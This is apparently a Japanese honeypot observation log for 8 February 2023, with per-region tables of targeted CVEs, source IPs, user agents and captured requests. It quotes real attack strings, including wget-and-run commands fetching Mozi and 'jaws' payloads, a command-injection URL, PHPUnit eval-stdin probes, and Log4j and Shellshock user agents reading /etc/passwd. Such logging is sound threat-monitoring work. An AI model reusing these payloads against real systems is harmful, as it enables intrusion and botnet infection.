ハニーポット(仮) 観測記録 2023/02/08分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為
Location:JP
Alcatel-Lucent OmniPCX Enterpriseの脆弱性(CVE-2007-3010)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
curlによるスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 137.175.17.190/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 5.255.105.240/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget http://115.98.182.246:40861/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
Alcatel-Lucent OmniPCX Enterpriseの脆弱性(CVE-2007-3010)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 205.185.121.139/jaws; sh /tmp/jaws
Location:UK
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
5.188.210.227に関する不正通信
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 205.185.121.139/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget heylitimysun.top/jaws; sh /tmp/jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Apache Struts 2の脆弱性を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Drupalの脆弱性(CVE-2018-7600)を狙うアクセス
Joomla!の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Lucee Adminの脆弱性(CVE-2021-21307)を狙うアクセス
OpenAMの脆弱性(CVE-2021-35464)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
Pulse Secureのの脆弱性(CVE-2017-9841)を狙うアクセス
RaspAPの脆弱性(CVE-2021-33357)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Spring Frameworkの脆弱性(CVE-2022-22965)を狙うアクセス
TerraMaster TOSの脆弱性(CVE-2020-28188)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
VMware View Plannerの脆弱性(CVE-2021-21978)を狙うアクセス
WordPress Pluginの脆弱性を狙うアクセス
YeaLink DMの脆弱性(CVE-2021-27561)を狙うアクセス
ZhiyuanOAの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
fuel CMSの脆弱性(CVE-2018-16763)を狙うアクセス
vBulletinの脆弱性(CVE-2019-16759)を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
.sqlへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 94.158.247.123/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:141 (前日比:-42)
US:総アクセス数:90 (前日比:-3)
UK:総アクセス数:101 (前日比:-1)
SG:総アクセス数:5142 (前日比:3505)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 4.28.87.68 | United States |
1 | 20.83.177.140 | United States |
1 | 20.150.210.254 | United States |
1 | 20.165.130.216 | United States |
1 | 20.193.139.90 | United States |
63 | 35.92.197.4 | United States |
11 | 35.173.234.123 | United States |
2 | 45.11.57.48 | Ukraine |
1 | 45.33.80.243 | United States |
1 | 45.56.108.128 | United States |
1 | 45.79.181.179 | United States |
1 | 45.79.181.251 | United States |
1 | 45.134.140.181 | United Kingdom |
1 | 47.108.65.237 | China |
1 | 51.77.247.119 | France |
1 | 92.118.39.82 | Romania |
7 | 95.214.235.205 | Ukraine |
3 | 101.32.209.199 | Singapore |
2 | 109.206.240.137 | Bulgaria |
1 | 115.28.215.147 | China |
1 | 115.98.182.246 | India |
1 | 115.213.223.114 | China |
1 | 128.14.141.34 | United States |
1 | 134.122.135.178 | Singapore |
2 | 134.209.144.46 | United States |
15 | 135.125.246.189 | France |
2 | 159.203.63.162 | United States |
1 | 172.104.11.34 | United States |
1 | 172.104.11.46 | United States |
1 | 172.104.11.51 | United States |
1 | 172.104.131.24 | United States |
2 | 172.105.82.111 | United States |
1 | 172.105.128.11 | United States |
1 | 172.105.128.13 | United States |
1 | 185.225.74.130 | Bulgaria |
1 | 185.254.196.115 | Ukraine |
1 | 192.155.90.118 | United States |
1 | 195.133.40.81 | Czechia |
1 | 198.199.94.6 | United States |
1 | 205.210.31.34 | United States |
1 | 205.210.31.155 | United States |
1 | 221.10.121.188 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
24 | - |
1 | Hello World |
3 | Hello, world |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
63 | Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_3) AppleWebKit/535.9 (KHTML, like Gecko) Chrome/18.0.1139.96 Safari/536.32 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
27 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
1 | Mozilla/5.0 zgrab/0.x |
1 | curl/7.64.0 |
1 | python-requests/2.28.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 |
||
20 | \x16\x03\x01 |
||
1 | \x16\x03\x02\x01o\x01 |
||
29 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.local |
HTTP/1.1 |
1 | GET | /.production |
HTTP/1.1 |
1 | GET | /.remote |
HTTP/1.1 |
1 | GET | //admin/.env |
HTTP/1.1 |
1 | GET | //administrator/.env |
HTTP/1.1 |
1 | GET | //api/.env |
HTTP/1.1 |
1 | GET | //app/.env |
HTTP/1.1 |
1 | GET | //apps/.env |
HTTP/1.1 |
1 | GET | //assets/.env |
HTTP/1.1 |
1 | GET | //config/.env |
HTTP/1.1 |
1 | GET | //core/.env |
HTTP/1.1 |
1 | GET | //core/Datavase/.env |
HTTP/1.1 |
1 | GET | //core/app/.env |
HTTP/1.1 |
1 | GET | //cron/.env |
HTTP/1.1 |
1 | GET | //cronlab/.env |
HTTP/1.1 |
1 | GET | //database/.env |
HTTP/1.1 |
1 | GET | //en/.env |
HTTP/1.1 |
1 | GET | //exapi/.env |
HTTP/1.1 |
1 | GET | //lab/.env |
HTTP/1.1 |
1 | GET | //laravel/.env |
HTTP/1.1 |
1 | GET | //lib/.env |
HTTP/1.1 |
1 | GET | //psnlink/.env |
HTTP/1.1 |
1 | GET | //public/.env |
HTTP/1.1 |
1 | GET | //saas/.env |
HTTP/1.1 |
1 | GET | //site/.env |
HTTP/1.1 |
1 | GET | //sitemaps/.env |
HTTP/1.1 |
1 | GET | //tools/.env |
HTTP/1.1 |
1 | GET | //uploads/.env |
HTTP/1.1 |
1 | GET | //v1/.env |
HTTP/1.1 |
1 | GET | //v2/.env |
HTTP/1.1 |
1 | GET | //vendor/.env |
HTTP/1.1 |
1 | GET | //web/.env |
HTTP/1.1 |
1 | GET | /99vt |
HTTP/1.1 |
1 | GET | /99vu |
HTTP/1.1 |
1 | GET | /FORu |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /aaaaaaaaaaaaaaaaaaaaaaaaaqr |
HTTP/1.1 |
1 | GET | /apis/apps/v1/namespaces/kube-system/daemonsets |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /cgi-bin/downloadFlile.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http[:]//vzwebsite[.]ir/fuez/potar.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; |
HTTP/1.1 |
1 | GET | /gate.php |
HTTP/1.1 |
2 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /qiqi/94644/ |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+5[.]255[.]105[.]240/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]98[.]182[.]246:40861/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
3 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
1 | POST | //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //lib/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //lib/phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //lib/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //vendor/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //vendor/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 |
HTTP/1.1 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /dev/.env |
HTTP/1.1 |
1 | POST | /index.htm |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 45.79.128.205 | United States |
1 | 45.79.172.21 | United States |
1 | 45.79.181.179 | United States |
1 | 45.79.181.223 | United States |
1 | 45.79.181.251 | United States |
1 | 49.143.32.6 | South Korea |
40 | 51.79.29.48 | Canada |
1 | 61.53.88.52 | China |
1 | 92.118.39.82 | Romania |
1 | 107.170.228.23 | United States |
1 | 109.107.166.87 | Russia |
1 | 109.206.240.137 | Bulgaria |
2 | 109.237.98.226 | Russia |
1 | 117.204.148.212 | India |
1 | 128.1.248.26 | United States |
1 | 134.122.184.11 | Singapore |
1 | 149.34.245.25 | United States |
2 | 162.142.125.211 | United States |
2 | 162.142.125.212 | United States |
1 | 162.243.140.32 | United States |
1 | 162.243.143.23 | United States |
2 | 167.248.133.117 | United States |
1 | 172.104.11.34 | United States |
1 | 172.104.11.46 | United States |
1 | 172.104.11.51 | United States |
1 | 172.105.128.11 | United States |
2 | 179.43.177.242 | Panama |
3 | 185.224.128.219 | Netherlands |
2 | 185.246.220.98 | Bulgaria |
1 | 194.87.151.116 | Czechia |
4 | 194.180.49.108 | Bulgaria |
1 | 195.133.40.81 | Czechia |
1 | 195.226.194.70 | Russia |
1 | 198.199.105.190 | United States |
1 | 205.185.115.65 | United States |
1 | 205.210.31.140 | United States |
1 | 209.141.41.230 | United States |
1 | 216.218.206.68 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
22 | - |
1 | Go-http-client/1.1 |
1 | Hello World |
1 | Hello, World |
2 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
41 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
3 | Mozilla/5.0 zgrab/0.x |
3 | python-requests/2.22.0 |
4 | python-requests/2.28.2 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_34.68.118.83_80\n |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
12 | \x16\x03\x01 |
||
41 | GET | /.env |
HTTP/1.1 |
4 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
3 | GET | /admin/config.php |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /cgi-bin/downloadFlile.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http[:]//vzwebsite[.]ir/fuez/potar.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /qiqi/94644/ |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+205[.]185[.]121[.]139/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | HEAD | /.env |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
6 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
3 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 5.188.210.227 | Russia |
2 | 45.79.128.205 | United States |
1 | 45.79.172.21 | United States |
2 | 45.79.181.94 | United States |
3 | 45.79.181.104 | United States |
1 | 45.79.181.223 | United States |
1 | 45.227.254.19 | Belize |
47 | 51.79.29.48 | Canada |
1 | 65.49.20.68 | United States |
1 | 66.240.205.34 | United States |
1 | 86.136.31.186 | United Kingdom |
4 | 89.248.172.16 | United Kingdom |
1 | 92.118.39.82 | Romania |
2 | 109.107.166.76 | Russia |
2 | 109.237.98.226 | Russia |
1 | 123.58.207.247 | Hong Kong |
1 | 128.14.134.170 | United States |
2 | 152.89.196.211 | Russia |
1 | 162.243.152.17 | United States |
1 | 169.57.196.28 | United States |
1 | 172.104.11.34 | United States |
1 | 172.104.11.51 | United States |
3 | 179.43.177.242 | Panama |
4 | 185.142.236.34 | Seychelles |
2 | 185.224.128.219 | Netherlands |
3 | 185.246.220.98 | Bulgaria |
1 | 192.155.90.220 | United States |
1 | 192.241.198.33 | United States |
1 | 192.241.206.16 | United States |
1 | 192.241.226.43 | United States |
3 | 194.87.151.116 | Czechia |
1 | 195.133.20.253 | Czechia |
1 | 198.235.24.132 | United States |
1 | 198.235.24.175 | United States |
1 | 205.185.113.173 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
28 | - |
1 | Go-http-client/1.1 |
1 | Hello World |
2 | Hello, world |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
48 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
9 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 zgrab/0.x |
2 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad |
||
1 | MGLNDD_132.145.66.34_80\n |
||
1 | SSH-2.0-libssh2_1.10.0 |
||
3 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
15 | \x16\x03\x01 |
||
1 | CONNECT | www[.]google[.]com:443 |
HTTP/1.1 |
48 | GET | /.env |
HTTP/1.1 |
2 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
2 | GET | /admin/config.php |
HTTP/1.1 |
1 | GET | /cgi-bin/downloadFlile.cgi |
HTTP/1.1 |
3 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+205[.]185[.]121[.]139/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun[.]top/jaws;sh+/tmp/jaws |
HTTP/1.1 |
2 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
9 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.210.197.114 | United States |
1 | 20.55.53.144 | United States |
1 | 20.111.54.227 | United States |
1 | 20.210.239.129 | United States |
1308 | 35.183.70.152 | United States |
2 | 45.9.110.186 | Hong Kong |
2 | 45.9.168.176 | Hungary |
1 | 45.56.108.128 | United States |
2 | 45.79.181.94 | United States |
1 | 45.79.181.104 | United States |
1 | 45.79.181.179 | United States |
1 | 45.79.181.223 | United States |
1 | 45.79.181.251 | United States |
3723 | 45.113.0.46 | Hong Kong |
46 | 51.79.29.48 | Canada |
1 | 51.103.92.238 | United Kingdom |
1 | 52.80.165.91 | China |
1 | 52.146.21.242 | United States |
1 | 64.62.197.223 | United States |
1 | 66.249.71.211 | United States |
1 | 92.118.39.82 | Romania |
4 | 109.206.240.137 | Bulgaria |
2 | 109.237.98.226 | Russia |
1 | 128.14.141.34 | United States |
1 | 134.122.135.178 | Singapore |
2 | 134.209.94.46 | United States |
2 | 137.184.218.207 | United States |
2 | 143.110.242.169 | United States |
4 | 162.142.125.210 | United States |
1 | 169.57.196.28 | United States |
1 | 172.104.11.4 | United States |
1 | 172.105.128.12 | United States |
2 | 172.105.128.13 | United States |
2 | 178.128.174.119 | United States |
6 | 183.136.225.32 | China |
3 | 185.224.128.219 | Netherlands |
1 | 185.246.220.98 | Bulgaria |
2 | 192.155.90.220 | United States |
1 | 194.87.151.116 | Czechia |
1 | 195.133.40.83 | Czechia |
1 | 198.23.254.214 | United States |
1 | 198.199.117.213 | United States |
1 | 198.235.24.14 | United States |
1 | 205.210.31.38 | United States |
1 | 219.146.152.234 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
1 | ${jndi:ldap://127[.]0[.]0[.]1#.${hostName}.useragent.} |
2 | () { :; }; echo ; echo ; /bin/cat /etc/passwd |
70 | - |
1 | Go-http-client/1.1 |
1 | Hello World |
1 | Hello, world |
2 | MSIE |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
107 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 |
104 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 |
102 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 |
118 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 |
114 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 |
111 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 |
119 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 |
107 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 |
116 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
107 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 |
1308 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
115 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
126 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 |
1 | Mozilla/5.0 (Windows NT 10.0; rv:103.0) Gecko/20100101 Firefox/103.0 |
1 | Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 |
107 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 |
109 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 |
118 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 |
128 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 |
124 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 |
122 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
112 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 |
